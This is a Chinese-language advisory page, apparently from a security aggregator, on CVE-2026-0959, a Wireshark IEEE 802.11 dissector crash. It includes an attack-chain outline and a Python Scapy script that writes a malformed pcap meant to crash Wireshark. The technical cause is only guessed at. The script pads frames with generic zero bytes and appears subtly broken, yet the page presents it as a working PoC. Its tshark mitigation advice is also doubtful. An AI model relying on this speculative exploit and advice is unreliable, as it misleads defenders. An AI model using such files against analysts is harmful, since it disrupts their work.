CVE-2026-0959 CVSS 5.3 中危

CVE-2026-0959: Wireshark IEEE 802.11协议解析器崩溃导致拒绝服务

披露日期: 2026-01-14

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-0959

漏洞类型

拒绝服务

CVSS评分

5.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Wireshark

漏洞概述

CVE-2026-0959是Wireshark中的一个安全漏洞，存在于IEEE 802.11协议解析器中。该漏洞影响Wireshark 4.6.0至4.6.2版本以及4.4.0至4.4.12版本。攻击者可以通过构造恶意的IEEE 802.11协议数据包来触发解析器崩溃，从而导致Wireshark进程异常终止，造成拒绝服务（DoS）攻击。此漏洞需要用户交互，即受害者需要打开或分析包含恶意数据包的捕获文件。由于该漏洞位于协议解析层面，攻击可通过网络传输恶意捕获文件或诱骗用户打开恶意pcap文件实施。CVSS评分为5.3，属于中等严重程度，主要影响可用性。

技术细节

该漏洞位于Wireshark的IEEE 802.11协议解析模块（dissector）中。当解析器处理格式错误的802.11帧时，可能导致内存访问违规或断言失败，从而引发崩溃。具体问题可能涉及：1）帧长度字段与实际数据不匹配；2）子帧类型解析异常；3）位字段解析错误导致缓冲区边界检查失效。攻击者可通过Ettercap、Scapy或伪造AP等工具构造恶意802.11帧，注入到网络流量中或创建恶意pcap文件。当Wireshark用户打开该捕获文件进行协议分析时，解析器会触发异常并崩溃。漏洞影响所有使用Wireshark进行无线流量分析的用户。

攻击链分析

STEP 1

步骤1

攻击者使用Scapy等工具构造恶意的IEEE 802.11格式错误的数据帧，设置无效的帧控制字段和长度值

STEP 2

步骤2

攻击者将恶意数据帧注入到目标网络，或创建包含恶意帧的pcap文件

STEP 3

步骤3

受害者使用存在漏洞的Wireshark版本（4.6.0-4.6.2或4.4.0-4.4.12）打开恶意捕获文件或捕获网络流量

STEP 4

步骤4

Wireshark的IEEE 802.11协议解析器处理恶意帧时触发内存访问违规或断言失败

STEP 5

步骤5

Wireshark进程崩溃，导致拒绝服务，受害者无法继续进行网络流量分析

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
# CVE-2026-0959 PoC - Malicious IEEE 802.11 Frame Generator
# This PoC generates a malformed 802.11 frame that triggers Wireshark dissector crash

from scapy.all import RadioTap, Dot11, Dot11Beacon, Dot11Elt
from scapy.layers.dot11 import Dot11, Dot11Beacon
import struct

def create_malformed_80211_frame():
    """Generate a malformed IEEE 802.11 frame for CVE-2026-0959"""
    
    # Create RadioTap header with malformed length
    radio = RadioTap()/b'\x00' * 50  # Malformed RadioTap header
    
    # Create malformed Dot11 frame
    # Set invalid frame control field and length values
    dot11 = Dot11(
        type=2,        # Data frame
        subtype=0,     # No subtype
        FCfield=0,
        ID=0,
        addr1='ff:ff:ff:ff:ff:ff',
        addr2='aa:bb:cc:dd:ee:ff',
        addr3='aa:bb:cc:dd:ee:ff'
    )
    
    # Add malformed payload with invalid length fields
    payload = b'\x00' * 200  # Malformed payload
    
    frame = radio / dot11 / payload
    return frame

def save_pcap(filename):
    """Save malformed frames to pcap file"""
    from scapy.all import wrpcap
    frames = [create_malformed_80211_frame() for _ in range(10)]
    wrpcap(filename, frames)
    print(f"Malicious pcap saved to {filename}")

if __name__ == '__main__':
    save_pcap('cve_2026_0959_poc.pcap')
    print("PoC generated. Open with Wireshark to trigger vulnerability.")

影响范围

Wireshark 4.6.0 - 4.6.2

Wireshark 4.4.0 - 4.4.12

防御指南

临时缓解措施

在未安装修复版本之前，避免使用Wireshark分析来自不可信来源的网络流量。对于必须分析的场景，可使用命令行工具（如tshark）并限制处理的文件来源，或在沙箱环境中进行分析以降低风险。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表